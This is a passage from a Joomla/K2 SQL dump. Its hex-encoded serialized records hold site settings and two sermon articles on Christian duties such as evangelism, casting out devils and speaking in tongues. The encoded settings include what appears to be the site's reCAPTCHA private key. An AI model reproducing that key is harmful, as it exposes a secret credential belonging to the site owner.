b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2238223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a35333a2231373a6265636f6d696e672d616e2d6566666563746976652d63687269737469616e2d696e2d74686573652d6c6173742d64617973223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a37313a22636f6d706f6e656e742f6b322f6974656d2f31372d6265636f6d696e672d616e2d6566666563746976652d63687269737469616e2d696e2d74686573652d6c6173742d64617973223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3137223b733a353a22726f757465223b733a39303a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d31373a6265636f6d696e672d616e2d6566666563746976652d63687269737469616e2d696e2d74686573652d6c6173742d64617973223b733a353a227469746c65223b733a35303a224265636f6d696e6720416e204566666563746976652043687269737469616e20696e207468657365204c6173742044617973223b733a31313a226465736372697074696f6e223b733a3432303a22204c756b652031333a362d392c204a6f686e2031353a382c2031362c204d6174746865772032353a31342d333020596f752077696c6c20626520616d617a6564207468617420476f642066726f776e7320617420616e20756e667275697466756c206368696c642e204865206973206e6f7420636f6d696e6720746f206a75646765206f6e6c79207468652073696e6e6572732c20746865204c6f726420697320636f6d696e6720616c736f20666f722074686520756e667275697466756c2043687269737469616e732c2048652063616c6c73207468656d207769636b65642073657276616e747320284c756b652031393a32302d3234292e204576656e204a657375732068616420746f2063757273652061206669672074726565207468617420686164206f6e6c79206c65617665732062757420776974686f757420616e792066727569747320746f2073686f7720666f722069742e20412043687269737469616e2073686f756c64206e6f74206f6e6c792062652066756c6c206f662061637469766974696573206275742062652066756c6c206f6620726573756c74732e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30312d32322030383a35373a3038223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30312d32322030383a35373a3038223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(239, 'index.php?option=com_k2&view=item&id=19', 'index.php?option=com_k2&view=item&id=19:correct-christian', 'How to Be a Correct Christian in a World of Pollution and Mixtures (Part 1) - Romans 12:1-2', ' God and the devil have been engaged in an all-out war for the souls of men for a very long time. And as Christians, we are to be God\'s representatives on the earth in this war. We are His soldiers. We have been empowered with many a tool to bring forth destruction upon the kingdom of darkness. Sadly, however, in these modern times, we Christians have become increasingly confused individuals. ', '2017-06-25 14:18:23', 'a94de1ba6da7f6a0afaec2f185cc2e10', 1, 1, 1, '*', '2017-01-29 10:24:14', '0000-00-00 00:00:00', '2017-01-29 10:24:14', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223139223b733a353a22616c696173223b733a31373a22636f72726563742d63687269737469616e223b733a373a2273756d6d617279223b733a3430333a223c703e476f6420616e642074686520646576696c2068617665206265656e20656e676167656420696e20616e20616c6c2d6f75742077617220666f722074686520736f756c73206f66206d656e20666f7220612076657279206c6f6e672074696d652e20416e642061732043687269737469616e732c2077652061726520746f20626520476f64277320726570726573656e74617469766573206f6e2074686520656172746820696e2074686973207761722e205765206172652048697320736f6c64696572732e2057652068617665206265656e20656d706f77657265642077697468206d616e79206120746f6f6c20746f206272696e6720666f727468206465737472756374696f6e2075706f6e20746865206b696e67646f6d206f66206461726b6e6573732e205361646c792c20686f77657665722c20696e207468657365206d6f6465726e2074696d65732c2077652043687269737469616e732068617665206265636f6d6520696e6372656173696e676c7920636f6e667573656420696e646976696475616c732e3c2f703e0d0a223b733a343a22626f6479223b733a353438313a220d0a3c703e5468657265206e6f206c6f6e67657220657869737473206120636c6561722064656d6172636174696f6e206265747765656e206d6f73742043687269737469616e7320616e64207468652072657374206f662074686520776f726c642e2050656f706c6520617265206c6f73696e672067726f756e6420746f2074686520656e656d7920616e64207468657920617265206c6f73696e6720697420666173742e20546869732070726f626c656d20492062656c6965766520636f6d6573206f7574206f6620616e206964656e74697479206372697369732ec2a03c2f703e0d0a3c703e3c7374726f6e673e5468652050726f626c656d73205468617420506c6167756520546f646179e28099732043687269737469616e20616e6420486f7720546f20536f6c7665205468656d2e203120436f72696e746869616e732031303a31312d31332e3c2f7374726f6e673e3c2f703e0d0a3c703e596f7520617265206e6f742074686520666972737420706572736f6e20746f2070617373207468726f756768207768617420796f752061726520676f696e67207468726f756768207269676874206e6f7720616e6420796f75206d757374206e6f74206661696c20476f6420696e20796f75722067656e65726174696f6e2e205768656e20796f7520756e6465727374616e64207468652077696c6573206f662074686520656e656d792c2068652077696c6c206e6f742062652061626c6520746f206465636569766520796f7520616e796d6f72652e20486572652061726520736f6d65206f6620746865206d616a6f722070726f626c656d7320666163696e6720746f64617927732043687269737469616e6974793a3c2f703e0d0a3c6f6c3e0d0a3c6c693e546865726520697320776964657370726561642069676e6f72616e636520696e20746865206368757263682061626f75742064657374696e792c20707572706f73652c2070726f706572206265686176696f722c206472657373696e672c206574632e2049742068617320726561636865642074686520706f696e74206e6f7720746861742061206c6f74206f662043687269737469616e7320636f6d6520746f2063687572636820616c726561647920646f756274696e6720746865204269626c6520776974686f7574206b6e6f77696e672e3c2f6c693e0d0a3c6c693e4d6f73742043687269737469616e7320617265207368616c6c6f7720696e20746865697220776f7264206c6576656c2c20666169746820616e642073706972697475616c2077616c6b207769746820476f642e204d616a6f72697479206f662043687269737469616e7320746f6461792c2063616e277420626f617374206f662061207374656164792071756965742074696d652c207468657920626172656c79206b6e6f77207768617420746865204269626c652068617320746f207361792061626f757420746865697220736974756174696f6e2c2066757475726520616e64207468656972207269676874732e3c2f6c693e0d0a3c6c693e436f6e74616d696e6174696f6e206f6620746865207368656570666f6c6420616e642070756c70697420616c696b652e20476976696e6720626972746820746f2043687269737469616e732077686f2061726520746f6f20776f726c646c7920746f2062652063616c6c65642043687269737469616e7320616e6420746f6f206368757263687920746f2062652063616c6c656420756e62656c6965766572732e20c2a049206b6e6f772074687920776f726b732c20746861742074686f7520617274206e65697468657220636f6c64206e6f7220686f743a204920776f756c642074686f75207765727420636f6c64206f7220686f742e20526576656c6174696f6e20333a31352d31363c2f6c693e0d0a3c6c693e4c756b657761726d2043687269737469616e6974792e204974277320646f637472696e6573206c696b65207468697320746861742070726f647563652043687269737469616e732077686f2063616e207370656e64206d6f72652074696d65207761746368696e67206120736f636365722067616d65207468616e207468657920776f756c6420696e20636875726368206f6e2053756e6461792e20546865206469726563742064616e676572206f6620746869732069732074686174206974207075747320796f75206174206c6f676765726865616473207769746820476f642e3c2f6c693e0d0a3c6c693e4d6f73742043687269737469616e732068617665206265636f6d6520746f6f2066697861746564206f6e2c206f62736573736564207769746820616e642064726976656e20627920746865207468696e6773206f662074686520776f726c642073756368206173206361726565722c206d6f6e65792c2066616d6520616e6420737461747573207468617420746865792069676e6f726520746865207265616c20726561736f6e2077687920746865792061726520616c69766520696e2074686520666972737420706c6163653a20776869636820697320746f20736572766520476f642e20c2a03c2f6c693e0d0a3c2f6f6c3e0d0a3c703e3c7374726f6e673e44757469657320616e64204578706563746174696f6e73206f662043687269737469616e73204163747320393a36204d6174746865772032383a31392d323020616e64204d61726b2031363a31352d31383c2f7374726f6e673ec2a03c2f703e0d0a3c703e41732043687269737469616e732077652068617665206d616e792073706972697475616c20726573706f6e736962696c69746965732e20596f7572206669727374206475747920617320612043687269737469616e2069732061732061204d657373656e676572206f662074686520676f6f64206e65777320746f20746865206e6174696f6e732e205468697320697320796f757220636f72652061737369676e6d656e742e20496e206d79206368757263682c2054686520447265616d2043656e747265206f6620746865204c696665204f6173697320496e7465726e6174696f6e616c204368757263682c206f6e65206f66206f7572207068696c6f736f7068696573206973207468617420224576657279206d656d6265722c2061206d696e69737465722e222054686520626173696320616e642067656e6572616c20636f6d6d697373696f6e20616c6c2043687269737469616e73207368617265206f6e20656172746820697320746f207370726561642074686520676f7370656c20746f20616c6c20746865206e6174696f6e732e2042757420697420646f65736e27742073746f702074686572652e20496e204d6174746865772773206163636f756e742c204a6573757320736169642077652073686f756c642062617074697a65207468656d20696e20486973206e616d6520616e64207465616368207468656d20746f206f62736572766520616c6c2074686520636f6d6d616e646d656e74732048652068617320676976656e2075732e20476f6420726571756972657320746861742065766572792043687269737469616e206d75737420626520636f6d706574656e7420616e64207374726f6e6720656e6f75676820696e20746865697220666169746820746f2062652061626c6520746f206361727279206f75742074686520666f6c6c6f77696e673ac2a03c2f703e0d0a3c6f6c3e0d0a3c6c693e3c7374726f6e673e596f75206d7573742062652061626c6520746f20746561636820746865206e6174696f6e733c2f7374726f6e673e2e2054686973206d65616e7320796f752073686f756c642068617665206c6561726e7420656e6f7567682066726f6d20796f757220506173746f722c20796f7572204269626c6520737475647920616e642074686520486f6c79205370697269742c20746f206566666563746976656c792074656163682074686520676f7370656c20746f2070656f706c6520616e79776865726520796f752066696e6420796f757273656c6620746f206120706f696e7420776865726520746865792063616e20636f6d666f727461626c65207465616368206f746865727320616c736f2e3c2f6c693e0d0a3c6c693e3c7374726f6e673e596f75206d75737420686176652061207374726f6e6720756e6465727374616e64696e67206f662074686520636f6e636570747320616e64207072656365707473206f66206261707469736d2e3c2f7374726f6e673e205468657365204261707469736d7320696e636c756465206261707469736d20696e746f204368726973742028746865206e6577206269727468292c20486f6c792047686f7374206261707469736d20616e64207761746572206261707469736d2e3c2f6c693e0d0a3c6c693e3c7374726f6e673e596f75206d75737420686176652061206669726d206772617370206f662074686520636f6d6d616e646d656e747320676976656e20746f20757320696e20746865206f6c6420616e64206e65772074657374616d656e742e3c2f7374726f6e673e205468697320697320696d706f7274616e7420626563617573652069742065717569707320796f7520746f2062652061626c6520746f20677569646520616e64206469736369706c65206e65772043687269737469616e7320746f206120706c616365206f6620756e6465727374616e64696e672c20666f72207468656d20746f2062652061626c6520746f20666f6c6c6f772074686f736520636f6d6d616e646d656e74732070726f7065726c792e3c2f6c693e0d0a3c2f6f6c3e0d0a3c703e4c6574277320686176652061206c6f6f6b206174207468652072656d61696e696e6720726571756972656d656e747320746861742061726520616464656420696e204d61726b2773206163636f756e743a3c2f703e0d0a3c6f6c3e0d0a3c6c693e3c7374726f6e673e596f75206d7573742062652061626c6520746f2063617374206f757420646576696c733c2f7374726f6e673e2e203220436f72696e746869616e7320333a31372e205468697320706f696e74206973206f6e6520617265612049276d2068756e647265642070657263656e74207375726520746865206d616a6f72697479206f662043687269737469616e7320616e642063687572636865732065697468657220646f6e27742062656c6965766520696e206f722070757368206f6e2074686520706173746f727320616c6f6e652e20412043687269737469616e207468617420646f65736e2774206b6e6f7720686f7720746f2063617374206f757420646576696c732066726f6d2070656f706c65206f7220706c616365732c206973206c696b65206120736f6c64696572207468617420646f65736e2774206b6e6f7720686f7720746f206f7065726174652068697320776561706f6e727920616e64206b696c6c2074686520656e656d792e20596f75206d757374206265636f6d6520612074687265617420746f2074686520646576696c2c20737563682074686174207768656e20796f75206d6f766520696e746f2061206e657720617265612c2073746172742061206e6577206a6f62206f72206d65657420612064656d6f6e20706f7373657373656420706572736f6e2c2074686520646576696c2063616e2062652073757265207468617420796f752077696c6c20636173742068696d206f757420616e642070757420612073746f7020746f20686973206f7065726174696f6e7320776974686f7574206e65676f74696174696f6e2e3c2f6c693e0d0a3c6c693e3c7374726f6e673e596f75204d7573742042652041626c6520546f20537065616b20496e20546f6e6775657320416e642048617665204120436c65617220556e6465727374616e64696e67204f662054686520416476616e7461676520497420476976657320596f753c2f7374726f6e673e2e20526f6d616e7320383a32362d32372e20537065616b696e6720696e20746f6e677565732069732061207665727920706f77657266756c20746f6f6c20666f72207468652043687269737469616e20626563617573652069742067697665732074686520486f6c792053706972697420726f6f6d20746f2070726179207468726f75676820796f752e204b6e6f77696e6720686f7720746f20737065616b20696e20746f6e67756573206973206f6e65207468696e672c20756e6465727374616e64696e6720636c6561726c792c2077687920796f7520646f20736f20697320616e6f74686572206d617474657220656e746972656c792e2e20486f77657665722c2074686520656666696369656e6379206f662074686973206973206469726563746c792064657465726d696e656420627920686f772077656c6c20796f7520756e6465727374616e64207768617427732068617070656e696e672e20496e2c20746865206269626c652073686f777320757320776861742068617070656e73207768656e20776520737065616b20696e20746f6e677565732e3c2f6c693e0d0a3c6c693e3c7370616e207374796c653d22666f6e742d73697a653a2031322e313670783b223e3c7374726f6e673e596f75206d7573742062652061626c6520746f206f7065726174652061742061206c6576656c206f6620666169746820616e6420636f6e666964656e6365207468617420616c6c6f777320676f6420746f20776f726b207468726f75676820796f7520746f20646f2068697320677265617420776f726b2e3c2f7374726f6e673e20496e204d61726b20636861707465722031362076657273652031382c20746865204269626c6520736179732c20726566657272696e6720746f2075732c2074686174207765207368616c6c2074616b652075702073657270656e74733b20616e64206966207765206472696e6b20616e7920646561646c79207468696e672c206974207368616c6c206e6f7420687572742075733b207765207368616c6c206c61792068616e6473206f6e20746865207369636b2c20616e64207765207368616c6c207265636f7665722e2054686573652061726520616c6c206d697261636c657320627574207468657920646f6e2774206a7573742068617070656e206175746f6d61746963616c6c792e20496620796f7520646f6e27742062656c69657665206d652c206a7573742077616c6b20757020746f20746865206e65617265737420686f73706974616c20616e64206465636c61726520776974686f7574206661697468207468617420796f7527726520746865726520746f206865616c20746865207369636b2c20796f7572206661696c757265206973206365727461696e2e20496e206f7264657220746f2077616c6b20696e20746865207265616c6d206f6620746865206d69726163756c6f75732073686f776e20686572652c20796f75206d75737420646576656c6f7020796f757220666169746820696e20476f6420616e6420796f757220636f6e666964656e636520696e20486973206162696c6974792ec2a03c2f7370616e3e3c2f6c693e0d0a3c2f6f6c3e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30312d32392031323a33323a3230223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a